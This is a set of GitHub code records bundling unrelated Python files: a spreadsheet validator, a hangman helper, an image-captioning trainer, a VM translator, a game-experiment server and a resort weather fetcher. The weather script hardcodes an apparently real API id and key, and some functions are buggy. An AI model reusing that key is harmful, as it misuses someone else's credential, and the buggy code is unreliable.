function was made to validate the items in column A using the isinstance()\n # function and then storing all the \"non-integers\" in a list\n id_list = list(document['row_id'])\n bad_cell_id = []\n\n for i, row in enumerate(id_list):\n if not isinstance(row, int):\n bad_cell_id.append({\"row\": i, \"column\": \"row_id\", \"value\": row})\n\n return bad_cell_id\n\n\ndef email_validator(document): # this function is designed to validate the items in column G using the\n # \"validate_email\" library and then store all non-email items in a list\n email_list = list(document['email'])\n bad_cell_email = []\n\n for i, row in enumerate(email_list):\n v = validate_email(f'{row}')\n if not v:\n bad_cell_email.append({\"row\": i, \"column\": \"email\", \"value\": row})\n\n return bad_cell_email\n\n\ndef sales_validator(document): # this function was made to validate the items in the \"sales\" column using the\n # isinstance() function, but I didn't find an alternative to validate correctly\n sales_list = list(document['sales'])\n bad_cell_sales = []\n\n for i, row in enumerate(sales_list):\n if not isinstance(row, float):\n bad_cell_sales.append({\"row\": i, \"column\": \"row_id\", \"value\": row})\n\n return bad_cell_sales\n","repo_name":"joaovitorsh/Academic-Works-and-Activities","sub_path":"Python/read excel/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"31033473505","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCe programme sert a stocker les différentes fonctions utilisées dans le programme principal\n@author: Hector Irrmann\nCreated on Fri Dec 11 08:26:42 2020\nTo Do: rajouter et faire fonctionner les fonctions pour tkinter\n\"\"\"\nfrom tkinter import Tk, Entry, Button, Canvas, Label, StringVar\nfrom random import randint\n\ndef freponse(): #Renvoi le mot à trouver\n listeMots=[\"jour\",\"mois\",\"poste\",\"annee\",\"python\",\"abeille\",\"ordinateur\"]\n a=randint(0,6)\n mot=listeMots[a]\n return mot\n\n\n\ndef fLettres(mot): #Renvoi une liste avec toutes les lettres du mot séparées\n l1=[]\n for i in mot:\n l1.append(i)\n return l1\n\n\ndef fMot (listeLettre): #Renvoi une chaine de caractère avec toutes les lettres du mot sauf la première\n var=\"\"\n for i in listeLettre[1:]:\n var=var+i\n return var\n\n\n\ndef fEssai(lettre,proposition,lettretrouve): #renvoi les lettres trouvées\n if lettre not in proposition:\n proposition=proposition+lettre\n if lettre in Mot:\n lettretrouve=lettretrouve+lettre\n messagebox.showinfo('Bien joué!')\n essai.set('')\n else:\n messagebox.showinfo('Le mot mystère ne contient pas cette lettre')\n essai.set('')\n else:\n messagebox.showinfo('Vous avez déjà essayé cette lettre, veuillez en essayer une autre')\n essai.set('')\n \n \n return lettretrouve\n \n\n\ndef fAffiche(listeLettre): #renvoi le mot mystère avec des '_' pour les lettres qu'on ne connait pas\n reponse=listeLettre[0]\n for i in Mot:\n if i in lettretrouve:\n reponse=reponse+i\n else:\n reponse=reponse+\" _\"\n return reponse\n\n\ndef fChance(chance): #pour l'instant pas grand chose\n if chance==8:\n return \n\n \n\n\n","repo_name":"Hector-Irr/Python_pendu","sub_path":"ma_lib_tkinter.py","file_name":"ma_lib_tkinter.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39021398997","text":"import torch\nimport numpy as np\nfrom torchvision import transforms\nfrom dataset import *\nfrom model import encoder, decoder\nimport sys\ndef train():\n # few things that we have define\n batch_size = 32\n train = True\n transform_train = transforms.Compose([\n transforms.Resize(256), # smaller edge of image resized to 256\n transforms.RandomCrop(224), # get 224x224 crop from random location\n transforms.ToTensor(), # convert the PIL Image to a tensor\n transforms.Normalize((0.485, 0.456, 0.406), # normalize image for pre-trained model\n (0.229, 0.224, 0.225))])\n iteration = 3\n vocabulary_threshold = 5\n embed_size = 512\n hidden_size = 512\n hidden_layer =1\n model_save = \"model_storage/\"\n # calling the dataloader\n train_dataLoader = get_data_loader(vocabulary_threshold, train, batch_size, transform_train)\n enc = encoder(embed_size, batch_size)\n dec = decoder(len(train_dataLoader.dataset.vocab.word_to_index), embed_size, hidden_layer, hidden_size)\n params = list(enc.dense.parameters()) + list(dec.parameters())\n criteria = torch.nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(params, lr=0.001, betas=(0.9, 0.999), eps=1e-08)\n steps_per_epoch = int(np.math.ceil(len(train_dataLoader.dataset.caption_len)/batch_size))\n for epoch in range(iteration):\n for step in range(steps_per_epoch):\n index = train_dataLoader.dataset.trainIndices(batch_size)\n sampler = torch.utils.data.SubsetRandomSampler(index)\n train_dataLoader.batch_sampler.sampler = sampler\n img, caption = next(iter(train_dataLoader))\n enc.zero_grad()\n dec.zero_grad()\n features = enc(img)\n prediction = dec(features, caption)\n loss = criteria(prediction.view(caption.size(0)*caption.size(1),-1), caption.view(-1))\n loss.backward()\n optimizer.step()\n stats = \"[%d/%d] LOSS: %.4f, PERPLEXITY: %5.4f \"%(step, iteration, loss.item(), np.exp(loss.item()))\n print(\"\\r \"+stats, end=\"\")\n sys.stdout.flush()\n if step%1000 ==0 and step != 0:\n # here we save the weights\n torch.save({\n \"model_state\":enc.state_dict()\n },model_save+\"encoder_\"+str(step)+\".pth\")\n torch.save({\n \"model_state\":dec.state_dict()\n },model_save+\"decoder_\"+str(step)+\".pth\")\n print(\"\\r\"+stats)\n\nif __name__ == \"__main__\":\n train()\n","repo_name":"Anurich/Image-captioning","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"8866606599","text":"from enum import Enum\n\n\nclass Colors(Enum):\n blue = 0\n red = 1\n yellow = 2\n green = 3\n wild = 4\n\n\nclass Values(Enum):\n zero = 0\n one = 1\n two = 2\n three = 3\n four = 4\n five = 5\n six = 6\n seven = 7\n eight = 8\n nine = 9\n ten = 10\n draw2 = 11\n skip = 12\n reverse = 13\n draw4 = 14\n chooseColor = 15\n","repo_name":"NWuensche/UNOinPython","sub_path":"EnumsCards.py","file_name":"EnumsCards.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40022307563","text":"from __future__ import print_function,division,absolute_import \nimport random\nfrom twisted.internet import reactor\nfrom twisted.internet import task\n\nclass experimentClass():\n def __init__(self):\n self.setParameters()\n self.data['matchType']=\"regular\"\n self.monitorTaskList=['loadInstructions','startQuiz','startExperiment']\n\n # - store data in self.data[subjectID] which is a Subject object (defined below)\n # - send messages like self.messageToId(msg,sid)\n # - list of all subjects at self.data['subjectIDs']\n\n def setParameters(self):\n print(\"!!!!!!SET PARAMETERS!!!!!!!!\")\n\n self.data['francsPerDollar']=20\n self.data['exchangeRate']=float(1)/self.data['francsPerDollar']#dollars per point. So 0.05 if 5 cents per point.\n \n self.data['rowColors']={1:\"rgba(228,26,28,1)\",2:\"rgba(55,126,184,1)\",3:\"rgba(77,175,74,1)\"}\n self.data['colColors']={1:\"rgba(152,78,163,1)\",2:\"rgba(255,127,0,1)\",3:\"rgba(200,200,51,1)\"}\n\n self.data['rowActions']={1:\"U\",2:\"D\"}\n self.data['colActions']={1:\"L\",2:\"R\"}\n\n self.data['numberOfRows']=len(self.data['rowActions'])\n self.data['numberOfCols']=len(self.data['colActions'])\n\n self.data['groupSize']=2\n\n self.data['totalMatches']=2\n self.data['supergameLengths']={0:86,1:122,2:80,3:67,4:142} \n self.data['supergameLengths']={0:2,1:2,2:3,3:3,4:3} \n\n self.data['rawPays']={}\n self.data['rawPays'][0]={1:{1:[20,0],2:[-1,-1]},2:{1:[-1,-1],2:[0,10]}}\n self.data['rawPays'][1]={1:{1:[20,0],2:[-1,-1]},2:{1:[-1,-1],2:[0,10]}}\n self.data['rawPays'][2]={1:{1:[20,0],2:[-1,-1]},2:{1:[-1,-1],2:[0,10]}}\n self.data['rawPays'][3]={1:{1:[20,0],2:[-1,-1]},2:{1:[-1,-1],2:[0,10]}}\n self.data['rawPays'][4]={1:{1:[20,0],2:[-1,-1]},2:{1:[-1,-1],2:[0,10]}}\n\n def notAcceptingClientsAnymore(self):\n totalSubjects=len(self.data['subjectIDs'])\n if totalSubjects%2!=0:\n print(\"NEED MULTIPLE OF 2, CAN'T STOP ACCEPTING\")\n self.data['serverStatus']['acceptingClients']=1\n self.monitorMessage()\n else:\n thisMatchSubjects=self.data['subjectIDs'][:]\n groups=[]\n for groupNumber in range(totalSubjects//2):\n groups.append(thisMatchSubjects[groupNumber*2:groupNumber*2+2])\n\n self.data['pays']={}\n self.data['order']={}\n self.data['matching']={}\n self.data['roles']={}\n\n for match in range(self.data['totalMatches']):\n random.shuffle(thisMatchSubjects)\n self.data['pays'][match]={}\n self.data['matching'][match]={}\n self.data['order'][match]={}\n self.data['roles'][match]={}\n for groupNumber in range(totalSubjects//2):\n player1=thisMatchSubjects[2*groupNumber+0]\n player2=thisMatchSubjects[2*groupNumber+1]\n thesePays=self.data['rawPays'][match]\n thesePays,thisOrder=self.rawPayoffsSwitchActions(thesePays,0)\n self.data['order'][match][player1]=thisOrder\n thesePays,thisOrder=self.rawPayoffsSwitchActions(thesePays,1)\n self.data['order'][match][player2]=thisOrder\n\n self.data['pays'][match][player1]=self.rawPayoffsToRolePayoffs(thesePays,0)\n self.data['pays'][match][player2]=self.rawPayoffsToRolePayoffs(thesePays,1)\n self.data['matching'][match][player1]=[player2]\n self.data['matching'][match][player2]=[player1]\n self.data['roles'][match][player1]=0\n self.data['roles'][match][player2]=1\n print(\"matching set!!!!!!!\")\n\n\n\n def rawPayoffsSwitchActions(self,pays,player):\n #this function switched the names of actions for a given player\n player1Actions=[x for x in pays]\n player2Actions=[x for x in pays[player1Actions[0]]]\n if player==0:\n newPays={}\n random.shuffle(player1Actions)\n for o,n in zip(range(len(player1Actions)),player1Actions):\n newPays[n]={}\n for a2 in player2Actions:\n newPays[n][a2]=pays[o+1][a2]\n actionsOut=player1Actions\n elif player==1:\n newPays={}\n random.shuffle(player2Actions)\n for a1 in player1Actions:\n newPays[a1]={}\n for o,n in zip(range(len(player2Actions)),player2Actions):\n newPays[a1][o+1]=pays[a1][n]\n actionsOut=player2Actions\n return newPays,actionsOut\n\n\n\n def rawPayoffsToRolePayoffs(self,pays,role):\n #this ensures that players have correct payoffs when they have separate roles\n if role==0:\n paysOut=pays\n elif role==1:\n newPays={}\n for c1 in pays:\n for c2 in pays[c1]:\n this=pays[c1][c2]\n if c2 not in newPays:\n newPays[c2]={}\n newPays[c2][c1]=[this[1],this[0]]\n paysOut=newPays\n return paysOut\n\n \n def reconnectingClient(self,client):\n sid=client.subjectID\n if self.data['serverStatus']['page']==\"experiment\":#experimetn has started\n self.sendParameters(sid)\n self.data[sid].getStatus()\n self.updateStatus(sid)\n\n\n\n def displayFinalSummary(self,subjectID):\n if 'paymentSummary' not in self.data[subjectID].status:\n self.data[subjectID].status['paymentSummary']=\"Please wait for other subjects to finish.\"\n if \"doneWithEverything\" in self.data[subjectID].status:\n self.data[subjectID].status['page']=\"generic\"\n self.data[subjectID].status['message']=\"subjectID: %s
\"%(subjectID)+self.data[subjectID].status['paymentSummary']\n self.updateStatus(subjectID)\n\n\n\n def startExperiment(self,message,client):\n self.experimentSpecificMonitorTableEntries()\n self.data['serverStatus']['page']=\"experiment\" \n self.taskDone(message)\n self.data['currentMatch']=-1\n self.startMatch()\n print(\"Starting Experiment!\")\n\n\n def startMatch(self):\n self.data['currentMatch']+=1\n for sid in self.data['subjectIDs']:\n self.data[sid].newMatch(self.data['currentMatch'])\n self.sendParameters(sid)\n self.data[sid].getStatus()\n self.updateStatus(sid)\n\n def checkIfGroupFinished(self,sid):\n #allMembers including myself\n allMembers=self.data['matching'][self.data['currentMatch']][sid]+[sid]\n complete=True\n if self.data['matching'][self.data['currentMatch']][sid]==[\"randomPlayer\"]:\n if self.data[sid].status[\"stage\"]==\"bothSelected\":\n complete=True\n else:\n complete=False\n else:\n for s in allMembers:\n if self.data[s].status[\"stage\"]!=\"bothSelected\":\n complete=False\n break\n return complete\n\n def confirmMatchOver(self,message,client):\n sid=client.subjectID\n self.data[sid].status['stage']=\"matchOverConfirmed\"\n self.data[sid].getStatus()\n print(self.data[sid].status)\n self.updateStatus(sid)\n self.checkIfMatchFinished()\n\n\n def calculateFinalPayoffs(self,subjectID):\n #must determine how final payoffs will be calculated here\n self.data[subjectID].finalPayoffs['game']=5#francs\n # self.data[subjectID].finalPayoffs['bonus']=5#dollars\n\n self.data[subjectID].finalPayoffs['total']=self.data[subjectID].finalPayoffs['showup']#dollars\n self.data[subjectID].finalPayoffs['total']+=self.data[subjectID].finalPayoffs['bonus']#dollars\n self.data[subjectID].finalPayoffs['total']+=self.data[subjectID].finalPayoffs['game']*self.data['exchangeRate']\n\n self.data[subjectID].status['payment']=\"%.02f\"%(self.data[subjectID].finalPayoffs['total'])\n\n #self.data[subjectID].status['page']=\"generic\"\n self.data[subjectID].status['page']=\"questionnaire\"\n\n self.data[subjectID].status['message']=\"subjectID: %s
\"%(subjectID)\n self.data[subjectID].status['message']=\"Show Up Fee: $5
\"\n self.data[subjectID].status['message']+=\"Bonus Payment: $%s
\"%(self.data[subjectID].finalPayoffs['bonus'])\n self.data[subjectID].status['message']+=\"Game Earnings: %s francs
\"%(self.data[subjectID].finalPayoffs['game'])\n self.data[subjectID].status['message']+=\"Total Payoff = $%.02f\"%(self.data[subjectID].finalPayoffs['total'])\n\n self.updateStatus(subjectID)\n self.finalPayoffsSpecificMonitorTableEntries()\n self.monitorMessage()\n\n def checkIfMatchFinished(self):\n complete=True\n for sid in self.data['subjectIDs']:\n if self.data[sid].status['stage']!=\"matchOverConfirmed\":\n complete=False\n break\n if complete:\n if self.data['currentMatch']+1 You may read over the instructions as we wait to begin.\"]}\n\n def newMatch(self,match):\n self.currentPeriod=0\n self.currentMatch=match\n self.choices[self.currentMatch]={}\n self.choicesFromRawPaysGame[self.currentMatch]={}\n self.guesses[self.currentMatch]={}\n self.history[self.currentMatch]=[]\n self.payoffHistory[self.currentMatch]=[]\n self.myMatchPayoffs[self.currentMatch]=0\n self.opponentMatchPayoffs[self.currentMatch]=0\n self.status={\"page\":\"game\",\"stage\":\"makingChoices\",\"rowSelected\":\"No\",\"colSelected\":\"No\"}\n\n def getStatus(self):\n self.status['period']=self.currentPeriod\n self.status['match']=self.currentMatch\n self.status['history']=self.history[self.currentMatch]\n self.status['correctGuesses']=self.correctGuesses\n self.status['myMatchPay']=self.myMatchPayoffs[self.currentMatch]\n self.status['theirMatchPay']=self.opponentMatchPayoffs[self.currentMatch]\n self.status['myTotalPay']=self.totalPayoffs\n\n","repo_name":"jnromero/normalForm","sub_path":"files/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":19249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35374022536","text":"#!python\r\nimport sys,os\r\nfrom typing import List,Dict\r\n\r\nVM_COMENT = '//'\r\nVM_TRUE = '-1'\r\nVM_FALSE = '0'\r\n\r\nclass N2THackVMTranslator(object):\r\n\r\n def __init__(self, target_file_path: str):\r\n \r\n # 入力ファイル名と出力ファイル名を保持する変数を初期化\r\n self.vm_files = []\r\n self.asm_file = None\r\n\r\n self.vm_codes = {} # ファイルごとに1行ごとのVMコードを格納する\r\n self.parsed_vm_codes = {} # ファイルごとにVMコードのパース結果を格納する\r\n self.asm_codes = []\r\n\r\n def run(self):\r\n self.prepare_file_paths(target_file_path) # 入力ファイル名と出力ファイル名を設定\r\n self.load_vm_codes() # 入力ファイルの内容をリストに取り込む\r\n self.vm_tranlate()\r\n\r\n def prepare_file_paths(self, file_path):\r\n print(\" file_path = \" + file_path)\r\n\r\n if '.vm' in file_path:\r\n # --------------------------\r\n # ファイル指定の場合\r\n # --------------------------\r\n # 入力ファイル名を self.vm_files に設定\r\n self.vm_files = [file_path]\r\n # 出力ファイル名を self.asm_file に設定(拡張子を '.vm' から '.asm' に置換する)\r\n self.asm_file = file_path.replace('.vm', '.asm')\r\n\r\n else:\r\n # --------------------------\r\n # ディレクトリ指定の場合\r\n # --------------------------\r\n # 最後の '/' を削除\r\n file_path = file_path.rstrip('/')\r\n\r\n # os.walk を使ってディレクトリパス、ディレクトリ名、ファイル名を取得\r\n dirpath, dirnames, filenames = next(os.walk(file_path), ([], [], []))\r\n\r\n # '.vm' を含むファイルのみ対象とする\r\n vm_files = [filename for filename in filenames if '.vm' in filename]\r\n\r\n # 入力ファイル名を self.vm_files に設定(複数ファイルを想定)\r\n self.vm_files = [f\"{file_path}/{vm_file}\" for vm_file in vm_files]\r\n\r\n # 出力ファイル名を self.asm_file に設定(ディレクトリ名.asm)\r\n path_elements = file_path.split('/')\r\n self.asm_file = f\"{file_path}/{path_elements[-1]}.asm\"\r\n\r\n def load_vm_codes(self):\r\n # 入力ファイルの内容をリストに取り込む\r\n for vm_files in self.vm_files :\r\n self.vm_codes[vm_files] = []\r\n with open(vm_files, 'r') as input_file:\r\n # 入力ファイルの内容を1行ずつ読む\r\n for line in input_file:\r\n # 読み込んだ行をリストに追加\r\n self.vm_codes[vm_files].append(line.strip())\r\n\r\n\r\n def vm_tranlate(self):\r\n \"\"\"\r\n VMコードの変換\r\n \"\"\"\r\n\r\n code_writer = CodeWriter(self.asm_file)\r\n\r\n for vm_filepath, lines in self.vm_codes.items():\r\n print(f' File: {vm_filepath}')\r\n # 1行ずつVMコードを変換\r\n vm_parser = VMParser()\r\n vm_parser.vm_parse(lines)\r\n #vm_parser.increment()\r\n\r\n code_writer.write_assembly(vm_filepath,vm_parser.parsed_vm_codes)\r\n\r\n code_writer.close()\r\n\r\nclass VMParser(object):\r\n\r\n count=0\r\n @classmethod\r\n def increment(cls):\r\n cls.count += 1\r\n\r\n def __init__(self):\r\n # コマンドとコマンドタイプの対応辞書\r\n self.commands_dict = {\r\n 'add' : 'C_ARITHMETIC',\r\n 'sub' : 'C_ARITHMETIC',\r\n 'neg' : 'C_ARITHMETIC',\r\n 'eq' : 'C_ARITHMETIC',\r\n 'gt' : 'C_ARITHMETIC',\r\n 'lt' : 'C_ARITHMETIC',\r\n 'and' : 'C_ARITHMETIC',\r\n 'or' : 'C_ARITHMETIC',\r\n 'not' : 'C_ARITHMETIC',\r\n 'push' : 'C_PUSH',\r\n 'pop' : 'C_POP',\r\n 'label' : 'C_LABEL',\r\n 'goto' : 'C_GOTO',\r\n 'if-goto' : 'C_IF',\r\n 'function' : 'C_FUNCTION',\r\n 'return' : 'C_RETURN',\r\n }\r\n \r\n def vm_parse(self,lines):\r\n self.parsed_vm_codes=[]\r\n for line in lines:\r\n line = line.split(VM_COMENT)[0].strip()\r\n if line :\r\n # ディクショナリにパース結果を設定\r\n command_tokens = line.split()\r\n command_type = self.commands_dict[command_tokens[0]]\r\n\r\n # arg1 の設定\r\n if command_type == 'C_ARITHMETIC':\r\n arg1=command_tokens[0]\r\n elif command_type == 'C_RETURN':\r\n arg1=None\r\n else:\r\n arg1=command_tokens[1]\r\n\r\n # arg2 の設定\r\n if command_type == 'C_PUSH' or command_type == 'C_POP' or command_type == 'C_FUNCTION' or command_type == 'C_CALL':\r\n arg2=command_tokens[2]\r\n else:\r\n arg2=None\r\n\r\n parsed_line = {'command_type':command_type, 'arg1':arg1, 'arg2':arg2, 'vm_code' :line}\r\n\r\n # リストにディクショナリを追加\r\n self.parsed_vm_codes.append(parsed_line)\r\n\r\nclass CodeWriter(object):\r\n def __init__(self,asm_file):\r\n \"\"\"\r\n 生成した機械語のファイル出力\r\n \"\"\"\r\n print(f' OutFile: {asm_file}')\r\n self.output_file = open(asm_file, 'w')\r\n\r\n # メモリセグメントと実メモリのマッピング\r\n self.segment_dict = {\r\n 'local' : 'LCL',\r\n 'argument' : 'ARG',\r\n 'this' : 'THIS',\r\n 'that' : 'THAT',\r\n 'pointer' : '3',\r\n 'temp' : '5',\r\n 'static' : 'R16',\r\n 'constant' : 'undefined' # 実メモリへの割り当てなし\r\n }\r\n\r\n # ラベルのカウント:条件分岐毎にインクリメントし固有のラベルを作成する\r\n self.label_count = 1\r\n\r\n def write_assembly(self, vm_filepath,parsed_vm_codes):\r\n # VMファイル名を設定\r\n self.vm_filename=vm_filepath.split('/')[-1].split('.')[0]\r\n # コマンドタイプに応じてアセンブリコードを出力\r\n for command in parsed_vm_codes:\r\n vm_code = str(command['vm_code'])\r\n command_type = str(command['command_type'])\r\n arg1 = str(command['arg1'])\r\n arg2 = str(command['arg2'])\r\n\r\n self.output_line(f\"{VM_COMENT} {vm_code}\") # アセンブリの元となったVMコードを出力\r\n\r\n if command_type == \"C_ARITHMETIC\" :\r\n self.write_arithmetic(arg1)\r\n\r\n elif command_type in (\"C_PUSH\",\"C_POP\"):\r\n self.write_push_pop(command_type,arg1,arg2)\r\n else:\r\n pass\r\n \r\n def write_arithmetic(self,command):\r\n\r\n self.pop_stack_to_D()\r\n\r\n # unary operator\r\n if command == \"neg\":\r\n self.output_line(\"M=-D\") \r\n\r\n elif command == \"not\":\r\n self.output_line(\"M=!D\") \r\n\r\n # binary operator\r\n elif command in (\"add\",\"sub\",\"and\",\"or\"):\r\n self.sp_decrement()\r\n self.output_line(\"A=M\")\r\n if command == \"add\":\r\n self.output_line(\"M=D+M\") \r\n elif command == \"sub\":\r\n self.output_line(\"M=M-D\")\r\n elif command == \"and\":\r\n self.output_line(\"M=D&M\")\r\n elif command == \"or\":\r\n self.output_line(\"M=D|M\")\r\n\r\n # Comparison operator\r\n elif command in (\"eq\",\"gt\",\"lt\"):\r\n self.sp_decrement()\r\n self.output_line(\"A=M\")\r\n self.output_line(\"D=M-D\")\r\n\r\n label_true = f\"LABEL{str(self.label_count).zfill(5)}_TRUE\"\r\n label_end = f\"LABEL{str(self.label_count).zfill(5)}_END\"\r\n\r\n self.output_line(\"@\" + label_true)\r\n if command == \"eq\":\r\n self.output_line(\"D;JEQ\")\r\n elif command == \"gt\":\r\n self.output_line(\"D;JGT\")\r\n elif command == \"lt\":\r\n self.output_line(\"D;JLT\")\r\n\r\n # if false\r\n self.set_A_to_stack()\r\n self.output_line(f\"M={VM_FALSE}\") # set false valueW\r\n self.output_line(f\"@{label_end}\")\r\n self.output_line(\"0;JMP\")\r\n \r\n # if true\r\n self.output_line(f\"({label_true})\")\r\n self.set_A_to_stack()\r\n self.output_line(f\"M={VM_TRUE}\") #set true value (-1 = 0xffff)\r\n self.output_line(f\"({label_end})\")\r\n self.label_count += 1\r\n\r\n self.sp_increment()\r\n\r\n def write_push_pop(self,command_type,segment,index):\r\n '''\r\n command_type: C_PUSH or C_POP\r\n segment: メモリセグメント\r\n index : インデックス\r\n '''\r\n\r\n # (1) セグメントに対応したメモリアドレスを取得する\r\n segment_address = self.segment_dict[segment]\r\n\r\n # (2) セグメントとインデックスからPUSH/POP位置を計算する\r\n if(segment == \"constant\"):\r\n self.output_line(f\"@{index}\")\r\n else:\r\n if(segment in (\"local\",\"argument\",\"this\",\"that\")):\r\n self.output_line(f\"@{segment_address}\")\r\n self.output_line(\"D=M\")\r\n self.output_line(f\"@{index}\")\r\n self.output_line(\"A=D+A\")\r\n\r\n elif(segment in (\"pointer\",\"temp\")):\r\n self.output_line(f\"@R{str(int(segment_address) + int(index))}\")\r\n\r\n elif(segment == \"static\"):\r\n self.output_line(f\"@{self.vm_filename}.{index}\")\r\n \r\n # (3) PUSH/POPを実行する\r\n if(command_type == \"C_PUSH\"):\r\n if(segment == \"constant\"):\r\n self.output_line(\"D=A\") # 定数(constant)の場合はAレジスタに値をセット\r\n else:\r\n self.output_line(\"D=M\") # 定数以外はメモリから値を取得 (メモリアドレスは(2)で計算済み)\r\n self.push_D_to_stack()\r\n\r\n elif(command_type == \"C_POP\"):\r\n self.output_line(\"D=A\")\r\n self.output_line(\"@R13\")\r\n self.output_line(\"M=D\") # R13にPOP先のアドレスを保存\r\n self.pop_stack_to_D()\r\n self.output_line(\"@R13\")\r\n self.output_line(\"A=M\")\r\n self.output_line(\"M=D\")\r\n\r\n def push_D_to_stack(self):\r\n self.set_A_to_stack()\r\n self.output_line(\"M=D\") # Write data to top of stack\r\n self.sp_increment() # Increment SP\r\n\r\n def pop_stack_to_D(self):\r\n self.sp_decrement()\r\n self.output_line(\"A=M\")\r\n self.output_line(\"D=M\")\r\n\r\n def set_A_to_stack(self):\r\n self.output_line(\"@SP\") # Get current stack pointer\r\n self.output_line(\"A=M\") # Set address to current stack pointer\r\n\r\n def sp_increment(self):\r\n self.output_line(\"@SP\")\r\n self.output_line(\"M=M+1\")\r\n\r\n def sp_decrement(self):\r\n self.output_line(\"@SP\")\r\n self.output_line(\"M=M-1\")\r\n\r\n def output_line(self,mnemonic):\r\n print(mnemonic,file=self.output_file)\r\n\r\n def close(self):\r\n self.output_file.close()\r\n\r\nif __name__ == '__main__':\r\n if len(sys.argv) != 2:\r\n print(\"Usage: python3 n2t_hack_vm_translator.py or \")\r\n sys.exit(1)\r\n\r\n print(\"VM Translate Start\")\r\n target_file_path = sys.argv[1]\r\n\r\n vm_translator = N2THackVMTranslator(target_file_path)\r\n vm_translator.run()\r\n\r\n print(\"VM Translate End\")\r\n\r\n","repo_name":"i-net-singularity/nand2tetris_projects","sub_path":"07/n2t_hack_vm_translator.py","file_name":"n2t_hack_vm_translator.py","file_ext":"py","file_size_in_byte":11909,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22860640182","text":"import requests\nfrom datetime import date, timedelta\n\n\n'''\n***************************\n GET WEATHER DATA\n***************************\n'''\n\nAPP_ID = \"39eba088\"\nAPP_KEY = \"fe507959f9cfd3f54af726fc36e63d9a\"\n\n\n# takes in a Resorts list and set their matching ids\ndef set_resort_id(Resorts):\n resort_ids = [\"209004\", \"303020\", \"414002\", \"518005\", \"916004\"]\n for i in range(len(Resorts)):\n Resorts[i].set_id(resort_ids[i])\n\n\n# get JSON object\ndef request(r_id, app_id, app_key):\n return requests.get(\"https://api.weatherunlocked.com/api/resortforecast/\"\n \"{0}?app_id={1}&app_key={2}\"\n .format(r_id, app_id, app_key))\n\n\n# take in a Resorts list and get raw weather data of each Resort\ndef get_raw_weather(Resorts):\n raw_data = []\n for resort in Resorts:\n raw_data.append(request(resort.resort_id, APP_ID, APP_KEY).json())\n return raw_data\n\n\n# return the list of incoming 7 days' dates based on current dates\ndef get_forecast_week():\n today = date.today()\n seven_days = []\n for i in range(1, 8):\n next_day = today + timedelta(days=i)\n seven_days.append(next_day.strftime(\"%d/%m/%Y\"))\n return seven_days\n\n\n'''\n :Resorts: the list of Resorts objects\n'''\n# set core weather data into Resorts objects\ndef set_weather(Resorts):\n set_resort_id(Resorts)\n raw_data = get_raw_weather(Resorts)\n seven_days = get_forecast_week()\n set_weather_helper2(Resorts, raw_data, seven_days)\n\n\n'''\n :Resorts: the list of Resorts objects\n :raw_data: the list of full weather data without processed\n :seven_days: the list of the forecasting week from now\n'''\n# extract the core weather data from raw data on a future week, and populate them into all resort objects\ndef set_weather_helper2(Resorts, raw_data, seven_days):\n for d in range(len(seven_days)):\n for r in range(len(Resorts)):\n set_weather_helper1(seven_days[d], raw_data[r], Resorts[r], d)\n\n\n'''\n :forecast_date: the date of which weather to be forecasted\n :raw_data: the full weather data of each Resort without processed\n :resort: the particular resort which weather to be forecasted\n :kth_day: the Kth day need to be forecasted from now\n'''\n# abstract real-time core weather data on a single day and update in a single Resort object\ndef set_weather_helper1(forecast_date, each_raw_data, each_resort, kth_day):\n for day in each_raw_data[\"forecast\"]:\n if forecast_date in day.values():\n # choose date between 10am - 12am\n if \"10:00\" in day.values() \\\n or \"11:00\" in day.values() \\\n or \"12:00\" in day.values():\n # update core weather info on Kth day\n each_resort.weather[kth_day].set_weather(\n day[\"date\"],\n day[\"base\"][\"wx_desc\"],\n day[\"snow_in\"],\n day[\"rain_in\"],\n day[\"vis_mi\"],\n day[\"slp_in\"],\n day[\"base\"][\"temp_f\"],\n day[\"base\"][\"windspd_mph\"]\n )\n","repo_name":"Kaicheng1995/SkiBot","sub_path":"Data/data_weather.py","file_name":"data_weather.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73414306329","text":"from fastapi import APIRouter, Depends, HTTPException\nfrom odmantic import ObjectId\nfrom odmantic.session import AIOSession\nfrom sqlalchemy.orm import Session\n\nfrom app.api.middlewares import mongo_db, db, jwt_bearer\nfrom app.core.logging import get_logging\nfrom app.core.config import get_app_settings\nfrom app.services import crud, documents\nfrom app.domain.models import FullTime, User, Application\nfrom app.domain.schemas import (ApplicationCreate,\n FullTimeCreate,\n FullTimeUpdate,\n Msg,\n FullTimeResponse,\n ApplicationResponse,\n InitialLetter,\n WorkPlan,\n ViceFormat,\n CronJobCreate,\n Application_statusCreate\n )\nfrom app.domain.errors import BaseErrors\n\n\nrouter = APIRouter()\n\nlog = get_logging(__name__)\nsettings = get_app_settings()\n\n\n@router.post(\"/\", response_model=FullTimeResponse)\nasync def create_full_time(\n full_time: FullTimeCreate,\n *,\n current_user: User = Depends(jwt_bearer.get_current_active_user),\n engine: AIOSession = Depends(mongo_db.get_mongo_db),\n db: Session = Depends(db.get_db)\n) -> FullTimeResponse:\n \"\"\"\n Endpoint to create a application type full_time\n\n params:\n - body: full_timeCreate\n\n response:\n - full_time\n \"\"\"\n try:\n full_time_created = await crud.full_time.create(db=engine,\n obj_in=FullTime(**dict(full_time)))\n log.debug(' full_time_created', full_time_created)\n\n application = ApplicationCreate(\n mongo_id=str(full_time_created.id),\n application_sub_type_id=full_time.application_sub_type_id,\n user_id=current_user.id\n )\n application = crud.application.create(\n db=db, who=current_user, obj_in=application, status=6, observation='El usuario inició la dedicación')\n except 